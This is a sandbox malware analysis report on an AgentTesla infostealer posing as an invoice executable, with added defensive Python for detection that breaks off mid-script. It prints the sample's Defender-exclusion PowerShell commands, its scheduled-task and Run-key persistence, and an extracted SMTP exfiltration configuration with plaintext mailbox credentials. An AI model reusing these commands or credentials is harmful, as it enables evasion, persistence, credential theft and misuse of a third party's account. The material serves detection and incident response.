Windows Analysis Report
Total Invoices.exe

Overview

General Information

Sample name: Total Invoices.exe
Analysis ID: 1430700
MD5: cd3c05ebb9a3fca7aa748f522559b1ea
SHA1: 43dc8cdf47186a54dc38cd86450aca6f6361a9b4
SHA256: c96565623c3e405a370614f452383a763f5a48baf25e79f91a6311c9a0a8fd3a
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w10x64
  • Total Invoices.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\Total Invoices.exe" MD5: CD3C05EBB9A3FCA7AA748F522559B1EA)
    • powershell.exe (PID: 7148 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dWXyZYb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7536 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7196 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7372 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • dWXyZYb.exe (PID: 7480 cmdline: C:\Users\user\AppData\Roaming\dWXyZYb.exe MD5: CD3C05EBB9A3FCA7AA748F522559B1EA)
    • schtasks.exe (PID: 7720 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • GUIVTme.exe (PID: 7964 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • GUIVTme.exe (PID: 7224 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Malware Configuration

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted configuration (AgentTesla):
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.unitechautomations.com", "Username": "design@unitechautomations.com", "Password": "Unitech@123"}
Yara Overview

PCAP:

| Source | Rule | Description | Author |
|---|---|---|---|
| dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Memory dumps (first 5 of 19 entries shown):

| Source | Rule | Description | Author |
|---|---|---|---|
| 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
| 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
| 0000000D.00000002.2882242292.0000000002891000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
| 00000008.00000002.1804990629.00000000030BA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
| 0000000D.00000002.2882242292.0000000002899000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Unpacked PEs (first 5 of 22 entries shown):

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 8.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| 8.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | |
| 8.2.RegSvcs.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | $s1 to $s8, listed below |
| 0.2.Total Invoices.exe.4ebf748.10.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| 0.2.Total Invoices.exe.4ebf748.10.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | |

Strings matched by INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID in 8.2.RegSvcs.exe.400000.0.unpack:
  • 0x33b64: $s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x33bd6: $s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x33c60: $s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33cf2: $s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x33d5c: $s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x33dce: $s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x33e64: $s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x33ef4: $s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
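The eight strings above are the GUIDs of the Windows Vault credential schemas, which is why the rule treats an executable carrying them as a likely credential stealer. The scanner below is an added example and is not ditekSHen's rule or Joe Sandbox code: it searches a binary for each GUID as ASCII and as UTF-16LE (the form a .NET string literal takes in the assembly's #US heap), in upper and lower case, reports the offsets so they can be cross-checked against the $s1 to $s8 offsets in the report, and only calls a file suspicious when it starts with an MZ header and contains at least three distinct GUIDs (that threshold is an assumption, not the rule's). The schema names are those `vaultcmd /listschema` reports on Windows 10; the test input is constructed.

```python
"""Find Windows Vault schema GUIDs in a binary (added example, not the
INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID rule itself)."""

# GUID -> schema name as listed by `vaultcmd /listschema` on Windows 10.
VAULT_SCHEMA_GUIDS = {
    "2F1A6504-0641-44CF-8BB5-3612D865F2E5": "Windows Secure Note",
    "3CCD5499-87A8-4B10-A215-608888DD3B55": "Windows Web Password Credential",
    "154E23D0-C644-4E6F-8CE6-5069272F999F": "Windows Credential Picker Protector",
    "4BF4C442-9B8A-41A0-B380-DD4A704DDB28": "Web Credentials",
    "77BC582B-F0A6-4E15-4E80-61736B6F3B29": "Windows Credentials",
    "E69D7838-91B5-4FC9-89D5-230D4D4CC2BC": "Windows Domain Certificate Credential",
    "3E0E35BE-1B77-43E7-B873-AED901B6275B": "Windows Domain Password Credential",
    "3C886FF3-2669-4AA2-A8FB-3F6759A77548": "Windows Extended Credential",
}


def find_vault_guids(data):
    """Every occurrence of a vault schema GUID in `data`, sorted by offset.
    Each GUID is searched as ASCII and UTF-16LE, upper and lower case."""
    hits = []
    for guid, name in VAULT_SCHEMA_GUIDS.items():
        for text in (guid, guid.lower()):
            for encoding in ("ascii", "utf-16-le"):
                needle = text.encode(encoding)
                pos = data.find(needle)
                while pos != -1:
                    hits.append({"offset": pos, "encoding": encoding,
                                 "guid": guid, "name": name})
                    pos = data.find(needle, pos + 1)
    return sorted(hits, key=lambda h: h["offset"])


def classify(data, min_distinct=3):
    """Verdict plus evidence. `min_distinct` is an assumed threshold: one
    GUID can appear in legitimate credential-manager code, several of them
    together in a non-Microsoft binary is what the YARA hit is about."""
    hits = find_vault_guids(data)
    distinct = {h["guid"] for h in hits}
    is_pe = data[:2] == b"MZ"
    return {"is_pe": is_pe, "distinct_guids": len(distinct),
            "suspicious": is_pe and len(distinct) >= min_distinct,
            "hits": hits}


def build_sample():
    """Constructed input: a fake MZ header, four GUIDs stored as UTF-16LE
    (as a .NET #US heap would hold them) and one lowercase ASCII copy of a
    fifth, separated by zero padding."""
    guids = list(VAULT_SCHEMA_GUIDS)
    blob = bytearray(b"MZ" + b"\x90" * 62)
    for g in guids[:4]:
        blob += b"\x00" * 16 + g.encode("utf-16-le")
    blob += b"\x00" * 8 + guids[5].lower().encode("ascii") + b"\x00" * 8
    return bytes(blob)


def scan_file(path, min_distinct=3):
    with open(path, "rb") as fh:
        return classify(fh.read(), min_distinct)


if __name__ == "__main__":
    import sys
    report = scan_file(sys.argv[1]) if len(sys.argv) > 1 else classify(build_sample())
    for h in report["hits"]:
        print("0x%06x %-9s %s  %s" % (h["offset"], h["encoding"], h["guid"], h["name"]))
    print("suspicious:", report["suspicious"], "distinct GUIDs:", report["distinct_guids"])
```

Run it against the dumped `8.2.RegSvcs.exe.400000.0.unpack` to confirm the offsets line up with the $s1 to $s8 list; on a raw memory dump the same GUIDs will also surface as UTF-16LE, which is why both encodings are searched.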

Sigma Overview

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Total Invoices.exe", ParentImage: C:\Users\user\Desktop\Total Invoices.exe, ParentProcessId: 7088, ParentProcessName: Total Invoices.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", ProcessId: 7148, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 7372, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GUIVTme
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Total Invoices.exe", ParentImage: C:\Users\user\Desktop\Total Invoices.exe, ParentProcessId: 7088, ParentProcessName: Total Invoices.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", ProcessId: 7148, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\dWXyZYb.exe, ParentImage: C:\Users\user\AppData\Roaming\dWXyZYb.exe, ParentProcessId: 7480, ParentProcessName: dWXyZYb.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp", ProcessId: 7720, ProcessName: schtasks.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 192.185.129.60, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7372, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Total Invoices.exe", ParentImage: C:\Users\user\Desktop\Total Invoices.exe, ParentProcessId: 7088, ParentProcessName: Total Invoices.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp", ProcessId: 7196, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Total Invoices.exe", ParentImage: C:\Users\user\Desktop\Total Invoices.exe, ParentProcessId: 7088, ParentProcessName: Total Invoices.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", ProcessId: 7148, ProcessName: powershell.exe
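The Sigma data lines above fire on five behaviours that are visible in ordinary Sysmon telemetry: powershell.exe adding a Defender exclusion (including the base64offset form, which is how the rules still catch `Add-MpPreference` inside an `-EncodedCommand` blob), schtasks.exe importing a task from an XML file in a temp folder, schtasks.exe spawned by a binary running from a user-writable folder, a Run-key value pointing into AppData, and an outbound SMTP connection from a process that is no mail client. The script below is an added example that re-implements those checks in plain Python, not the Sigma rules themselves or Joe Sandbox code; the events are constructed from the values printed in this report, the mail-client allow-list is an assumption to tune per estate, and the field names mirror Sysmon event IDs 1, 3 and 13.

```python
"""Sigma-style checks over constructed Sysmon-like events (added example)."""
import base64
import re
from dataclasses import dataclass
from typing import List


@dataclass
class Event:
    event_id: int
    image: str = ""
    command_line: str = ""
    parent_image: str = ""
    target_object: str = ""   # EventID 13: registry key written
    details: str = ""         # EventID 13: value data written
    dest_port: int = 0        # EventID 3
    initiated: bool = False   # EventID 3: True for outbound connections


TEMP_DIRS = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)
USER_WRITABLE = re.compile(r"\\AppData\\|\\Users\\[^\\]+\\Desktop\\|\\ProgramData\\", re.I)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}  # assumed allow-list


def base64offset_variants(value: bytes) -> List[str]:
    """The three base64 encodings of `value` at byte alignments 0, 1 and 2,
    trimmed of the characters that depend on neighbouring bytes. This is
    the construction behind Sigma's base64offset modifier."""
    variants = []
    for shift in range(3):
        enc = base64.b64encode(b"\x00" * shift + value).decode("ascii")
        start = (0, 2, 3)[shift]
        end = (None, -3, -2)[(len(value) + shift) % 3]
        variants.append(enc[start:end])
    return variants


def encode_powershell_command(script: str) -> str:
    """What powershell.exe -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def mentions_add_mppreference(command_line: str) -> bool:
    if "add-mppreference" in command_line.lower():
        return True
    # The base64 form is case-sensitive on the casing inside the blob, so
    # only the canonical cmdlet casing is matched, in UTF-16LE and ASCII.
    needle = "Add-MpPreference"
    for raw in (needle.encode("utf-16-le"), needle.encode("ascii")):
        if any(v in command_line for v in base64offset_variants(raw)):
            return True
    return False


def _exe(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def powershell_defender_exclusion(ev: Event) -> bool:
    return (ev.event_id == 1 and _exe(ev.image) in {"powershell.exe", "pwsh.exe"}
            and mentions_add_mppreference(ev.command_line))


def schtasks_from_temp_xml(ev: Event) -> bool:
    cmd = ev.command_line.lower()
    return (ev.event_id == 1 and _exe(ev.image) == "schtasks.exe"
            and "/create" in cmd and "/xml" in cmd
            and TEMP_DIRS.search(ev.command_line) is not None)


def schtasks_suspicious_parent(ev: Event) -> bool:
    return (ev.event_id == 1 and _exe(ev.image) == "schtasks.exe"
            and USER_WRITABLE.search(ev.parent_image) is not None)


def autorun_key_to_user_dir(ev: Event) -> bool:
    return (ev.event_id == 13 and RUN_KEY.search(ev.target_object) is not None
            and USER_WRITABLE.search(ev.details) is not None)


def outbound_smtp_non_mail_client(ev: Event) -> bool:
    return (ev.event_id == 3 and ev.initiated and ev.dest_port in {25, 465, 587}
            and _exe(ev.image) not in MAIL_CLIENTS)


RULES = {
    "powershell_defender_exclusion": powershell_defender_exclusion,
    "schtasks_from_temp_xml": schtasks_from_temp_xml,
    "schtasks_suspicious_parent": schtasks_suspicious_parent,
    "autorun_key_to_user_dir": autorun_key_to_user_dir,
    "outbound_smtp_non_mail_client": outbound_smtp_non_mail_client,
}


def evaluate(events):
    """(rule name, process image) for every rule each event trips."""
    return [(name, _exe(ev.image)) for ev in events
            for name, rule in RULES.items() if rule(ev)]


# Constructed from the report's process tree and Sigma data lines.
SAMPLE_EVENTS = [
    Event(1, image=r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
          command_line=r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe"',
          parent_image=r"C:\Users\user\Desktop\Total Invoices.exe"),
    Event(1, image=r"C:\Windows\SysWOW64\schtasks.exe",
          command_line=r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp"',
          parent_image=r"C:\Users\user\Desktop\Total Invoices.exe"),
    Event(13, image=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
          target_object=r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GUIVTme",
          details=r"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"),
    Event(3, image=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
          dest_port=587, initiated=True),
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print("%-32s %s" % hit)
```

The base64offset trick matters here because the same sample could just as well have run `powershell -EncodedCommand ...`; a plain substring match on the command line would then miss the exclusion, while the three trimmed encodings still hit.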

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Total Invoices.exe", ParentImage: C:\Users\user\Desktop\Total Invoices.exe, ParentProcessId: 7088, ParentProcessName: Total Invoices.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp", ProcessId: 7196, ProcessName: schtasks.exe

Snort Overview

| Timestamp | SID | Source Port | Destination Port | Protocol | Classtype |
|---|---|---|---|---|---|
| 04/24/24-03:17:06.326829 | 2839723 | 49735 | 587 | TCP | A Network Trojan was detected |
| 04/24/24-03:17:14.975638 | 2839723 | 49736 | 587 | TCP | A Network Trojan was detected |
| 04/24/24-03:17:06.326829 | 2030171 | 49735 | 587 | TCP | A Network Trojan was detected |
| 04/24/24-03:17:14.975638 | 2851779 | 49736 | 587 | TCP | A Network Trojan was detected |
| 04/24/24-03:17:06.326860 | 2840032 | 49735 | 587 | TCP | A Network Trojan was detected |
| 04/24/24-03:17:06.326860 | 2855542 | 49735 | 587 | TCP | A Network Trojan was detected |
| 04/24/24-03:17:06.326860 | 2855245 | 49735 | 587 | TCP | A Network Trojan was detected |
| 04/24/24-03:17:14.975638 | 2840032 | 49736 | 587 | TCP | A Network Trojan was detected |
| 04/24/24-03:17:14.975638 | 2030171 | 49736 | 587 | TCP | A Network Trojan was detected |
| 04/24/24-03:17:06.326860 | 2851779 | 49735 | 587 | TCP | A Network Trojan was detected |
| 04/24/24-03:17:14.975638 | 2855542 | 49736 | 587 | TCP | A Network Trojan was detected |
| 04/24/24-03:17:14.975638 | 2855245 | 49736 | 587 | TCP | A Network Trojan was detected |

AV Detection

Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.unitechautomations.com", "Username": "design@unitechautomations.com", "Password": "Unitech@123"}
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe; ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe; Virustotal: Detection: 31%
Source: Total Invoices.exe; ReversingLabs: Detection: 60%
Source: Total Invoices.exe; Virustotal: Detection: 31%
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe; Joe Sandbox ML: detected
Source: Total Invoices.exe; Joe Sandbox ML: detected
Source: Total Invoices.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Total Invoices.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RegSvcs.pdb; source: GUIVTme.exe, 0000000F.00000000.1828432542.00000000007B2000.00000002.00000001.01000000.0000000E.sdmp, GUIVTme.exe.8.dr
Source: Binary string: aDox.pdbSHA256; source: Total Invoices.exe, dWXyZYb.exe.0.dr
Source: Binary string: RegSvcs.pdb; source: GUIVTme.exe, 0000000F.00000000.1828432542.00000000007B2000.00000002.00000001.01000000.0000000E.sdmp, GUIVTme.exe.8.dr
Source: Binary string: aDox.pdb; source: Total Invoices.exe, dWXyZYb.exe.0.dr

Networking

Source: Traffic; Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49735 -> 192.185.129.60:587
Source: Traffic; Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49735 -> 192.185.129.60:587
Source: Traffic; Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49735 -> 192.185.129.60:587
Source: Traffic; Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49735 -> 192.185.129.60:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49735 -> 192.185.129.60:587
Source: Traffic; Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.4:49735 -> 192.185.129.60:587
Source: Traffic; Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49736 -> 192.185.129.60:587
Source: Traffic; Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49736 -> 192.185.129.60:587
Source: Traffic; Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49736 -> 192.185.129.60:587
Source: Traffic; Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49736 -> 192.185.129.60:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49736 -> 192.185.129.60:587
Source: Traffic; Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.4:49736 -> 192.185.129.60:587
Source: Joe Sandbox View; IP Address: 192.185.129.60
Source: Joe Sandbox View; ASN Name: UNIFIEDLAYER-AS-1US
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; DNS traffic detected: queries for: mail.unitechautomations.com
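Both Snort-flagged flows are plaintext SMTP submissions on 587 from RegSvcs.exe, so the client side of the stream in dump.pcap carries everything needed to confirm the extracted configuration and to notify the abused mailbox's owner. The parser below is an added example, not Joe Sandbox or Emerging Threats code: it walks the client half of an SMTP session, recovers the EHLO name, AUTH LOGIN or AUTH PLAIN credentials, envelope sender and recipients and the message Subject, compares the credentials with the extracted configuration, and stops at STARTTLS because nothing after it is readable. The dialogue embedded here is constructed to match the report's configuration; it is not taken from the capture.

```python
"""Client-side SMTP session parser for exfil triage (added example)."""
import base64

EXTRACTED_CONFIG = {"Exfil Mode": "SMTP", "Port": "587",
                    "Host": "mail.unitechautomations.com",
                    "Username": "design@unitechautomations.com",
                    "Password": "Unitech@123"}


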